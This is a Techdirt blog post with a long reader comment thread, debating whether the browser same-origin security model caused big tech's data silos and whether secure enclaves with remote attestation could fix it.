How One 1990s Browser Decision Created Big Tech’s Data Monopolies (And How We Might Finally Fix It)
from the take-back-control dept
There’s a fundamental architectural flaw in how the internet works that most people have never heard of, but it explains nearly every frustration you have with modern technology. Why your photos are trapped in Apple’s ecosystem. Why you can’t easily move data between apps. Why every promising new service starts from scratch, knowing nothing about you. And most importantly, why AI—for all its revolutionary potential—risks making Big Tech even bigger instead of putting powerful tools in your hands.
Former Google and Stripe executive Alex Komoroske (who recently wrote for us about why the future of AI need not be centralized) has written an equally brilliant analysis that traces all of these problems back to something called the “same origin paradigm”—a quick security fix that Netscape’s browser team implemented one night in the 1990s that somehow became the invisible physics governing all modern software.
The same origin paradigm is simple but devastating: Every website and app exists in its own completely isolated universe. Amazon and Google might as well be on different planets as far as your browser is concerned. The Instagram app and the Uber app on your phone can never directly share information. This isolation was meant to keep you safe, but it created something Komoroske calls “the aggregation ratchet”—a system where data naturally flows toward whoever can accumulate the most of it.
This is a much clearer explanation of a problem I identified almost two decades ago—the fundamental absurdity of having to keep uploading the same data to new services, rather than being able to tell a service to access our data at a specific location on the internet. Back then, I argued that the entire point of the open internet shouldn’t be locking up data in private silos, but enabling users to control their data and grant services access to it on their own terms, for their own benefit.
What Komoroske’s analysis reveals is the architectural root cause of why that vision failed. The “promise” of what we optimistically called “the cloud” was that you could more easily connect data and services. The reality became a land grab by internet giants to collect and hold all the data they could. Now we understand why: the same origin paradigm made the centralized approach the path of least resistance.
As Komoroske explains, this architectural choice creates an impossible constraint for system designers.
This creates what I call the iron triangle of modern software. It’s a constraint that binds the hands of system designers—the architects of operating systems and browsers we all depend on. These designers face an impossible choice. They can build systems that support:
- Sensitive data (your emails, photos, documents)
- Network access (ability to communicate with servers)
- Untrusted code (software from developers you don’t know)
But they can only enable two at once—never all three. If untrusted code can both access your sensitive data and communicate over the network, it could steal everything and send it anywhere.
So system designers picked safety through isolation. Each app becomes a fortress—secure but solitary. Want to use a cool new photo organization tool? The browser or operating system forces a stark choice: Either trust it completely with your data (sacrificing the “untrusted” part), or keep your data out of it entirely (sacrificing functionality).
Even when you grant an app or website permission only to look at your photos, you’re not really saying, “You can use my photos for this specific purpose.” You’re saying, “I trust whoever controls this origin, now and forever, to do anything they want with my photos, including sending them anywhere.” It’s an all-or-nothing proposition.
This creates massive friction every time data needs to move between services. But that friction doesn’t just slow things down—it fundamentally reshapes where data accumulates. The service with the most data can provide the most value, which attracts more users, which generates more data. Each click of the ratchet makes it harder for new entrants to compete.
Consider how you might plan a trip: You’ve got flights in your email, hotel confirmations in another app, restaurant recommendations in a Google document, your calendar in yet another tool. Every time you need to connect these pieces you have to manually copy, paste, reformat, repeat. So you grant one service (like Google) access to all of this. Suddenly there’s no friction. Everything just works. Later, when it comes time to share your trip details with your fellow travelers, you follow the path of least resistance. It’s simply easier to use the service that already knows your preferences, history, and context.
The service with the most data can provide the most value, which attracts more users, which generates more data. Each click of the ratchet makes it harder for new entrants to compete. The big get bigger not because they’re necessarily better, but because the physics of the system tilts the playing field in their favor.
This isn’t conspiracy or malice. It’s emergent behavior from architectural choices. Water flows downhill. Software with the same origin paradigm aggregates around a few dominant platforms.
Enter artificial intelligence. As Komoroske notes, AI represents something genuinely new: it makes software creation effectively free. We’re entering an era of “infinite software”—endless custom tools tailored to every conceivable need.
AI needs context to be useful. An AI that can see your calendar, email, and documents together might actually help you plan your day. One that only sees fragments is just another chatbot spouting generic advice. But our current security model—with policies attached at the app level—makes sharing context an all-or-nothing gamble.
So what happens? What always happens: The path of least resistance is to put all the data in one place.
Think about what we’re trading away: Instead of the malleable, personal tools that Litt envisions, we get one-size-fits-all assistants that require us to trust megacorporations with our most intimate data. The same physics that turned social media into a few giant platforms is about to do the same thing to AI.
We only accept this bad trade because it’s all we know. It’s an architectural choice made before many of us were born. But it doesn’t have to be this way—not anymore.
But here’s the hopeful part: the technical pieces for a fundamentally different approach are finally emerging. The hopes I had two decades ago about the cloud being able to separate us from having to let services collect and control all our data may finally be possible.
Perhaps most interestingly, Komoroske argues that the technological element that makes this possible is the secure enclaves now found in chips. This is actually a tech that many of us were concerned would lead to the death of general purpose computers, and give more power to the large companies. Cory Doctorow has warned about how these systems can be abused—he calls them Demon-haunted computers—but could we also use that same tech to regain control?
That’s part of Komoroske’s argument:
These secure enclaves can also do something called remote attestation. They can provide cryptographic proof—not just a promise, but mathematical proof—of exactly what software is running inside them. It’s like having a tamper-proof seal that proves the code handling your data is exactly what it claims to be, unmodified and uncompromised.
If you combine these ingredients in just the right way, what this enables, for the first time, are policies attached not to apps but to data itself. Every piece of data could carry its own rules about how it can be used. Your photos might say, “Analyze me locally but never transmit me.” Your calendar might allow, “Extract patterns but only share aggregated insights in a way that is provably anonymous.” Your emails could permit reading but forbid forwarding. This breaks the iron triangle: Untrusted code can now work with sensitive data and have network access, because the policies themselves—not the app’s origin—control what can be done with the data.
Years of recognizing that Cory’s warnings are usually dead-on accurate has me approaching this embrace of secure enclaves with some amount of caution. The same underlying technologies that could liberate users from platform silos could also be used to create more sophisticated forms of control. But Komoroske’s vision represents a genuinely different deployment—using these tools to give users direct control over their own data and to cryptographically limit what systems can do with that data, rather than giving platforms more power to lock things down. The key difference is who controls the policies. (And I’m genuinely curious to hear what Cory thinks of this approach!)
The vision Komoroske paints is compelling: imagine tools that feel like extensions of your will, private by default, adapting to your every need—software that works for you, not on you. A personal research assistant that understands your note-taking system. A financial tracker designed around your specific approach to budgeting. A task manager that reshapes itself around your changing work style.
To the extent that any of this was possible before, it required you simply handing over all your data to a big tech firm. The possibility of being able to separate those things… is exciting.
This isn’t just about better apps. It’s about a fundamental shift in the power dynamics of the internet. Instead of being forced to choose between security and functionality, between privacy and convenience, we could have systems where those aren’t trade-offs at all.
The same origin paradigm got us here, creating the conditions for data monopolies and restricting user agency. But as Komoroske argues in both the piece he wrote for us and this new piece, we built these systems—we can build better ones. We might finally deliver on its promises of user empowerment rather than further concentration.
As we’ve argued at Techdirt for years, the internet works best when it empowers users rather than platforms. The same-origin paradigm was an understandable choice given the constraints of the 1990s. But we’re no longer bound by those constraints. The tools now exist to put users back in control of their data and their digital experiences.
We can move past the learned helplessness that has characterized the last decade of internet discourse. We can reject the false choice that says the only way to access powerful new technologies is to surrender our freedoms to tech giants. We can actually build toward a world where end users themselves have both the power and control.
We just need to embrace that opportunity, rather than assuming that the way the internet has worked for the past 30 years is the way it has to run going forward.
Filed Under: aggregation, alex komoroske, control, data, same origin paradigm, secure enclave, silos, trusted computing


Comments on “How One 1990s Browser Decision Created Big Tech’s Data Monopolies (And How We Might Finally Fix It)”
I won’t be reading Komoroske’s article. It is paywalled, which itself is a nice illustration of what’s wrong with the Internet.
The page says “Create a free account to continue reading”.
Riiight. If the account is free, then why not let me read it without an account? So it’s not really free, and you pay for it in another way.
Re:
Huh. Weird. Not for me. And I don’t pay them?
I just looked again, and it asks for an email address, but I clicked the “maybe later” and it went away and I could read the rest of the article.
How odd. I didn’t get that at all.
Re: Re:
Mine was paywalled. I tried creating a free account, but it wanted a credit card for a 15 day trial to view. I declined and left the page. Revisiting the page now (signed in, but without inputting a card), it’s letting me access the full thing.
(FWIW, this was on Firefox with Ublock running. On plain Chrome, the “maybe later” seems to have worked fine. So this may be browser dependent)
Re: Re: Re:
Well, I didn’t have much trouble either, except that the entire page was invisible (among the more than 3,300 total style sheet rules, “application-…” has “html { opacity:0 }” for some reason). Using Reader Mode or just disabling style sheets will fix that.
Archive.org apparently didn’t encounter a paywall either; for anyone who does have trouble, here’s the version it saved.
Re: Re:
FYI, AC is correct. When I visited the page, I was told I had to create a “free” account to continue reading, so although the article is free in that you don’t have to pay money to access it, it is also non-free in that you have to pay with PII instead.
Re: Re: Re:
This. Since even genuine websites may sell data in some countries or be subject to hacking attempts in others, I really have to think long and hard before filling in any form with my details, and I won’t do so just to access one article. Fuck that potentially dangerous shit.
Re: Re: Re:2
There are services such as Mailnesia that can be used for that. It used to be popular to create a “cypherpunks” login, with password “cypherpunks” or “writecode”, but many places no longer allow plain usernames (as opposed to e-mail addresses). Sometimes they insist on “secure” passwords, as if we’re gonna be accessing the Pentagon rather than some site we’ve never heard of before and will probably never think of again.
Even this minimal effort is too much just to see one article we’re vaguely interested in. The internet’s full of easier-to-access stuff we could be reading instead.
Re: Re: Re:
Some paywalls are intentionally “porous”. I suspect that’s, in part, so that some people will read the article and send it to others, without even realizing the company will try to extract money or personal data from those others.
Anyway, the archive.org link should work. (It turns out that “opacity:0” isn’t the only bad style rule—deleting it reveals some text but not the article. But the listed workarounds do work.)
Re: Re: Re:2
I wish. My only access to the Internet is through a library computer that blocks nearly everything, including Wikimedia Commons and archive websites.
Mike, explaining how bad the technical reification of this are is very difficult, so I’ll try to give a brief but decent over view. The very briefest is: “trusted remote compute is an intractable problem” there’s no cryptography in the world that can solve this problem.
I’m sure that you have a decent founding in cryptography and thus are thinking that can’t be true. After all we have some really great tech. There are at least two “easy” way to see this: First off: “Attestation”, in cryptography is (almost) universally a sign that you are using a asymmetric algorithm. This breaks down, when someone else has physical control of the hardware: because hardware is designed with operation conditions in mind, there are all kind of attacks you can do to bypass the crypto. For example glitch attacks on the power rails. Normally the system will have safe guards against this… but the system is designed to protect against accidents, not a hostile owner (at you should find the idea of a “hostile owner” alarming beyond words for other reasons). The first protections will likely be on the motherboard or power supply, and are thus “easily” modifiable. While there are lots of other physical attacks I wont cover all of them. The point is: if you have physical possession of the system, you can modify it (a thing which is only going to get easier… unless we centralize all technology and lock people into silos… what irony).
Additionally: Software bugs are inevitable for any non-trivial project. Even if you ignore the hardware attacks, an attack against your enclave (and it will have an attack surface… though if it’s well written and the enclave tech is good, it will be a relatively small one) AFTER attestation can do major damage well.
Going even further: How does your enclave software have access to it’s attestation secret, and how does it prevent people from accessing the secrete when it’s outside the enclave. The most common solution that I’ve seen enclave tech use is: a centralized authority will sign and encrypt (or delegate the ability to do so) the image, and burn “Trusted” keys for that into their SoC. This should also alarm you. Instead of obvious silos, you know have one or a few companies secretly controlling who has access to (or who can give access to) their enclave tech.
The last point I want to bring up is: Meltdown and spectrev1 (which I am hoping you have heard of, if not look them up) and the whole slew of hardware vulnerabilities that came after offer an important point: The complexities of modern hardware make it nearly impossible to assume there is not a hardware level security vulnerability in your system basic, “tried and true” protection mechanisms. If the tools we’ve long been relying on for simple security are so untrustworthy (in modern tech, though if you go read some old SPARCv9 docs, it looks like some of these concerns were not totally unforeseen), how then are we to believe brand new implementations of new stuff will be reliable anytime soon (hint: they wont).
Here is an example: https://en.wikipedia.org/wiki/Software_Guard_Extensions
SGX is an Intel “enclave” tech. And if you read it’s wikipedia page, it’s mostly security vulnerabilities.
PS: Do some searches for things like “breaking Trustzone” (and if you don’t know what it is, lookup arm trustzone)
PPS: Here’s invisible things lab on SGX’s initial announcement: https://theinvisiblethings.blogspot.com/2013/08/thoughts-on-intels-upcoming-software.html which should be good for getting a technical feel for whats happening with SGX
The idea that smartphone app isolation is a consequence of Netscape’s “same origin” policy is a pretty dubious claim, which the article doesn’t do much to support. I could just as well say it’s the result of early UNIX decisions. Specifically, making a multi-user system where users are protected from each other, but programs running under the same user account have exactly the same privileges. Android co-opted this existing feature, using one user account per app, thereby making them fully isolated. It was there, it was easy, they were in a hurry…
Of course, that UNIX feature can probably be traced back to Multics and elsewhere, and the hypothesis that it caused the isolation is still dubious. The idea of capability-based security also isolates processes, and was already commercialized in 1970 in the Plessey System 250. I could blame Lampson 1973, which starts off “Designers of protection systems are usually pre-occupied with the need to safeguard data from un-authorized access or modification”—but that suggests the idea of “isolation” for security was already ubiquitous. I’m not sure there are viable alternatives even now.
Maybe if the mobile operating systems encouraged developers to use the file system by default, and had easy sharing between apps (such as via the “powerbox” pattern), things would be better. Or maybe not. Plenty of Windows programs did not inter-operate well, even when they had no security barriers between them and Microsoft was trying to make it easy (via OLE, for example). You want to get your financial data from program A into program B? Each can see the other’s files, but good luck.
People still have to care. The users don’t seem to—apparently, many don’t even understand “files”. And the developers could be likened to “the phone company” from a 1976 Saturday Night Live sketch: “We don’t care; we don’t have to.”
Re:
The biggest challenge is simply in getting the data into a format that the receiving program understands. How easily you can transfer incomprehensible data isn’t a useful thing. DEC had the idea decades ago of separating the storage format from the native processing format so that all applications could understand data from other similar applications (Rich Text Format for word-processing documents, for instance). That never went anywhere.
IMO the paper is aiming at the wrong target, and secure enclaves won’t be any sort of solution to data sharing. The main idea behind them is that data in them is supposed to not be available directly to the applications running on the computer, which kind of defeats the purpose of sharing the data in the first place.
Re: Re:
Rich Text Format (RTF) was reasonably common as an “interchange” format in the 1990s—that is, various programs could save and load it despite it not being their native format. Before PDF was common, a Word user might save as RTF to send it to someone who didn’t have Word (which was most people—it cost many hundreds of dollars, whereas WordPad could read RTF and came with Windows).
And if I recall correctly, it was and perhaps still is common as a clipboard format, such as when one would select some text and choose the “Copy” option in Internet Explorer. It could then be pasted into any program that understood RTF, and would retain a decent amount of its formatting.
But whatever format we’re talking about, someone has to write the code to handle it (even if a library does most of the hard work). There’s not much incentive for someone who already has a monopoly to do that. Microsoft implemented RTF back when third-party word processors such as WordPerfect were dominant.
If this is interesting to you, you might want to look into what Apple (and more importantly, ARM) are doing in this area. At least publicly, they seem to be the ones pushing this forward the fastest.
It’s worth noting, there is still some level of trust required (if nothing else, because of physical access to the hardware, potential sideloading attacks, etc).
I don’t want to speak for Cory, but I suspect he’ll still be wary, because it will be possible to make these chips look (via e.g. cryptographic matches, not looking into the data itself) for things like DMCA violations. At the end of the day, you still don’t own the chips, they don’t work for you, and that comes with complications. But it’s potentially a big step closer. And it’s interesting tech, either way.
You should take a really close look at Nostr. It solves this problem.
Correcting Errors
This is incorrect. Web browsers are not the Internet. Human-facing Web sites are extremely popular, of course, but there are many other technologies on the Internet. The same-origin policy is a Web browser concept. Other types of software, such as desktop or mobile apps, are not subject to such limitations. If they were, then Web browsers could not exist, because a Web browser would only be able to talk to the provider of the browser, not Web sites at large.
This is incorrect. Not all software runs in Web browsers. Software that runs elsewhere may or may not be subject to this sort of restriction, and even Web apps can get past the restriction, as the Wikipedia article notes.
This is incorrect. See, for example, Techdirt’s articles on tracking cookies.
This is incorrect. See, for example, Techdirt’s coverage of Meta’s hackery. Or, if you prefer, I have a lot of material on inter-app communication in my books on Android app development.
This is an incorrect definition, with respect to how the rest of both pieces use the term “untrusted code”. Knowing a developer does very little with respect to trust (see the Meta example above). “Untrusted code” refers to not knowing what the code does, not who wrote it.
Re:
Wow, this Techdirt site sounds pretty informative; I’m sure Mike Masnick will be glad you brought it to his attention.
Re:
A usual security-engineering definition of “trusted” is “relied upon to enforce a specified security policy (to a specified extent)”. An operating system kernel is “trusted” in that if it breaks, you’re fucked; for example, a non-root user could read files that the policy says only root should be able to read. It follows that one should want as little trusted code as possible; in other words, the “trusted computing base” should be kept small.
“Untrusted”, then, is everything else. It doesn’t matter who wrote it, whether it or they are trust-worthy, or even whether the user knows what it does.
In the context of a security policy saying “Javascript code pulled from the web can’t delete my private ‘documents’ directory from my laptop”, the Javascript would be untrusted, and the browser would be trusted (by default, because it’d have enough privilege to read and write all my personal files). In the context of “Javascript code run by Alice cannot delete Bob’s documents”, the code and the browser would both be untrusted, because the kernel would be trusted to enforce that.
Re:
This naïve view is even more incorrect. Although you are right to assert that web browsers are not the internet, they are the tool by which the vast majority of people access it, and thus a hard to use browser can create an internet that is inaccessible to a non-technologically minded person.
Re: Re:
Are they, though? They certainly were. Now, a lot of people use smartphone apps to access the internet, perhaps more than they use browsers.
As for “vast majority”, I recall reading that smartphones are now the dominant platform for internet access (as opposed to desktop and laptop computers). I don’t know how the statistics for app use and browser use break down across all platforms, but you might be overstating the importance of browsers.
Re: Re: Re:
Taking the Facebook app as an example, that is a mobile device-specific browser that accesses only Facebook, so AC is correct.
Re: Re: Re:2
Okay, but that’s taking us back into the minutiae of the 1998 Microsoft trial. Is it a “browser” if it’s perceived by the user as “just” a help viewer, a Facebook app, or whatever? Or is it just the rich text renderer on which a browser would be based? (A “browser” being that plus navigation buttons, bookmarks, and other such things.)
I suppose it probably is implementing the Same-Origin Policy, although several people have noted how this policy is not a very convincing explanation for the behavior being complained about. Until that’s rectified, determining where browser-engine-based apps fit isn’t likely to be productive.
Re: Re: Re:3
Doubling down, always the most accurate sign of a losing argument. Thanks for playing.
I, for one...
welcome our beloved Big Tech overlords and the billionaires that control them.
I really want to believe in this. I yearn to get excited and energized by the prospects this implies. Providing Cory blesses it.
But I’ve been doing too much dating on horrid apps and am now hot stove shy about getting too fired up on chats only to be profoundly disappointed once I’ve left the coffee shop….prove me wrong.
I, for one...
welcome our beloved Big Tech overlords and the billionaires that control them.
I really want to believe in this. I yearn to get excited and energized by the prospects this implies. Providing Cory blesses it.
But I’ve been doing too much dating on horrid apps and am now hot stove shy about getting too fired up on chats only to be profoundly disappointed once I’ve left the coffee shop….prove me wrong.
I find this article weird. Sure, the Same Origin paradigm can cause fragmentation… but it’s designed to be applied to situations where you WANT to silo information based on origin of request.
The problem comes when developers blindly roll over the paradigm into situations where it isn’t the best opportunity.
In fact, when I decide what to do with my data, Same Origin is always one of the first considerations I make. As a result, I store my photos on NextCloud that I host myself; any place online that needs access to them, I can grant that access on a photo-by-photo or album-by-album basis.
Oauth also attempts to solve this issue: you select a central authentication authority, and other services can subscribe to it, being granted only access to the data that YOU choose to grant.
In short, there’s always been ways around the problem of miss-applied Same Origin, and these days it’s easier than ever to Do Things Right.
The only real problem is that Same Origin is just so much easier for everyone involved; it requires less thought, less effort, and less configuration to get right. So developers AND end users go there first, unless it doesn’t work at all.
Personally, I would never want to spend time on an Internet where Same Origin didn’t exist — where once someone had my PII, EVERYONE had it. Even if you exclude financial transactions, there’s just too much room for identity theft if you don’t start from Same Origin and then loosen access as needed.
Re:
The impression I’m getting is that of a popular-science view, like William Gibson or the writers of any Star Trek incarnation. Like, hey, I saw a recent news story about Intrusion Countermeasures Electronics, black holes, or the Same Origin Policy, and here’s a story constructed around the idea.
But attestation doesn't work that way
So, yes, secure enclaves can attest to what code they contain.
But that’s the problem – it’s the code they contain, usually as an aggregate binary, not as a list of separate capabilities.
At some point, you have to trust that whatever publisher released a package with only the capabilities they claim they wrote. If they lie you don’t have any way to tell; the only thing you can validate is if you’re running version x of whatever program y.
Re:
That’s not necessarily true. In a proper capability system, it’d have only the capabilities it was granted by the user.
It might be hard to make that set as minimal as you’d like; for example, a browser might need permission to talk to your bank and to Google, if the bank relies on some Google-hosted Javascript. That would make it hard for the system to enforce that it can’t send your banking data to Google.
I see no reason why such a system couldn’t be implemented in an enclave. But it easier to promote “trusted computing”—which is the exact opposite of what we should want—than trustworthy computing, which is legitimately hard to do across a whole system. And people fall for it.
Re: Re:
The problem is that any capabilities system is external to the binary, and isn’t truly capable of enforcing the fine-grained permissions listed in the article.
The idea in the article is that, essentially, you are giving Google your banking details; you’ve just set permissions such that they can only do some limited set of operations on it. That’s the part that isn’t really possible to enforce (without trusted third-party assessments).
Re: Re: Re:
At that point, it’s not really a “capability system” in the same sense anymore. With such a system, you could grant your bank permission (or not) to share specified data with Google. What Google’s allowed to do with it afterward is outside the scope of that system, and managed basically as a legal contract.
We can certainly hope for it.
Pretty words but completely unrealistic
I see that several people have already attempted to explain how misguided this article and Komoroske is, a.k.a. wrong.
Those of us that have worked closely with computer security and privacy, particularly breaking and defeating that very security and privacy see this as the same kind of nonsense that spawned provably correct code years back.
This whole concept is dependent upon implementing code that follows the rules, but if the rules were always followed we wouldn’t need it in the first place.
I’m reminded of a proposal to allow easier access to restricted data by always keeping the data on the secure server and having an App that only views it on the server. They actually believed they could see the server data without it ever leaving the secure server enclave.
A more current example perhaps is Proton Mail. The idea is that all your mail is encrypted based upon your password that only you have and it’s only decrypted in your client Browser or App. All that is true but the decryption is performed by code they provide. What if it doesn’t follow the rules?
Re:
They’ve released the Proton Mail Bridge as open-source, so I presume the decryption could be checked. The bigger program is the encryption. Any message that comes from outside of Proton Mail—which for most users would be almost all their messages—has its full text seen by the servers, which then encrypt it. They could save the messages elsewhere, store the symmetric encryption keys, whatever. Hushmail was compromised in exactly this way, to comply with court orders.
That’s not total bullshit. In large part it could be circumvented by someone with a camera, and it’s rare to find a workplace that strictly bans people from carrying those. But it means the viewer might not have all the data; just whatever subset is being viewed at the time, of which audit records can be kept. For example, a bank employee might pull up my records for the last month, and if they click a button they could get more, but if they do that a hundred times it might raise questions. (And there are many cases of implementers fucking this up, with the server sending all kinds of “extra” data but expecting the viewer to not show it.)
Re: Re: That’s not total bullshit.
Two immediate things wrong:
A current example of both of these things has been in the news, the SecDef using Signal. Signal is an extremely secure application, highly recommended. The problem was the quite literal man-in-the-middle on his own device outside of the secure enclave.
Re: Re: Re:
I have, but I’m not sure what your point is.
“Workplace” was mentioned in that it’s the only realistic way to possibly guard against a camera (but it doesn’t much happen outside military facilities, and in those cases spies can sometimes get past the checks). Someone working from home should just be assumed to have a camera, and access to all encrypted data streams. In which case, a “remote viewer” design pattern might make it easier to only send the data one intends to send; but the server has to guard against “bulk data ripping” somehow.
Re: Re: They’ve released the Proton Mail Bridge as open-source
You are ignoring:
Re: Re: Re:
Probably not too many people, but…
…the type of person who’d check is probably gonna build it themselves, or use a distribution-packaged binary (many of which are now built byte-for-byte reproducibly).
Of course, such a person might recognize that they’d still be fucked if the Proton Mail servers received their messages in plain text and didn’t handle them properly. So maybe they wouldn’t even be using the service.
“it makes software creation effectively free. We’re entering an era of “infinite software”—endless custom tools tailored to every conceivable need.”
No, we are not entering the age of free software. Software has to be written, tested, documented, deployed, maintained. Try to leave one step and at some point in time you will have a lot of bad fun.
Hasn’t the idea of infinite interoperability been tried before in the golden age of xml? This is an idea which can not work ever.
Re:
Not really. To expect XML to magically produce interoperability is like expecting Unicode to do it. It might help, but has little to do with the hardest problems.
Re: Re: Not really. To expect XML to magically ...
You’ve completely reversed his point, yes it was foolish for anyone to expect this from XML. That’s what he said!
Another concept that’s been a research project for a long time and has successfully succeeded in getting many research grants is Fully Homomorphic Encryption.
Think about that, it can answer your question without ever seeing the question! I’m betting that while they may achieve a literal success in some form of subset encryption break downs, it seems obvious to me that the same techniques of success will lend itself to infer the question even if a perfect bit-for-bit might not be possible, else how could it possibly work.
Re: Re: Re:
Techdirt has published articles on how people believing technology to be magic is harmful.
It seems the idea is very attractive.
Re: Re: Re:
I don’t see it as a reversal, but as agreement; a refutation of the hype around XML. “Interoperability” was marketing hype, but not something people really tried in earnest. OOXML is a great example; ostensibly for “interoperability”, but really just the old proprietary formats translated into XML (to fool regulators so they’d stop bothering Microsoft), such that one still has to implement all the legacy crap.
I share your view, but I’ll note that zero-knowledge computations are non-intuitive and can sometimes be surprisingly capable. I don’t see how it could be applied to something like ChatGPT (it’d see which combination of weights are “hit” and could reverse-engineer which data sources were strong influences, right?). But I can’t 100% rule that out.
just wanted to say this discussion was fascinating, even for someone who knows nothing about coding etc.! And quite civil to boot.
whoever was saying recently that there wasn’t enough “tech” left in the “techdirt” clearly was wrong, cuz this discussion gets deep into the “dirt” of “tech”!
🍿🍿🍿🍿🍿
absolute nonsense
this is absolute nonsense, and i don’t really understand how it ended up on Techdirt, since as far as i’m aware Mike is pretty competent when it comes to technology.
the best explanation i can come up with is that the original article (https://every.to/thesis/why-aggregators-ate-the-internet) is trying to use the same origin policy as some sort of journalistic metaphor for data silos, but the way it’s written doesn’t really support that.
or, perhaps, Alex Komoroske is trying to invent the phrase “same origin paradigm” to refer to any kind of security isolation, but since that has almost nothing to do with the same origin policy, i don’t see the connection.
needless to say, the same origin policy is not why mobile apps can’t talk to each other. firstly because mobile apps can communicate with each other, if both apps implement the appropiate Android or iOS protocol to do that. secondly because apps are not websites; sandboxing between apps is a basic security measure, completely unrelated to the same origin policy.
the same origin policy is also not why websites can’t talk to each other. if amazon.com and google.com want to talk to each other, all they need to do is implement a protocol to do that. that could be on the server side, but it can also be done on the client side, as seen in e.g. SAML. the reason they don’t do that is not because of the same origin policy, it’s because they don’t want to.
and even if two websites wanted to communicate with each other using Javascript requests, they can already do that by using a CORS policy (the HTTP Access-Control-Allow-Origin) header, so the same origin policy doesn’t even prevent that.
the same origin policy is a good thing and it’s a fundamental requirement to allow web browsers to operate securely. i find it mildly disturbing that people are attacking it without understanding it; this really feels a bit like people who attack Section 230 without understanding it because it prevents them from passing whatever law they want.
Re:
Thank you for writing this; I had the same thought. I’ve been doing web development since the mid-1990s and professionally since 1999; this whole article is basically gibberish, trying to invent the “same origin paradigm” out of thin air. But it doesn’t describe any tech or principles that actually happened, it (as you said) is coopting the name “same origin” from the well-known Same-Origin Policy to cover a dubious, unrelated set of technologies and practices.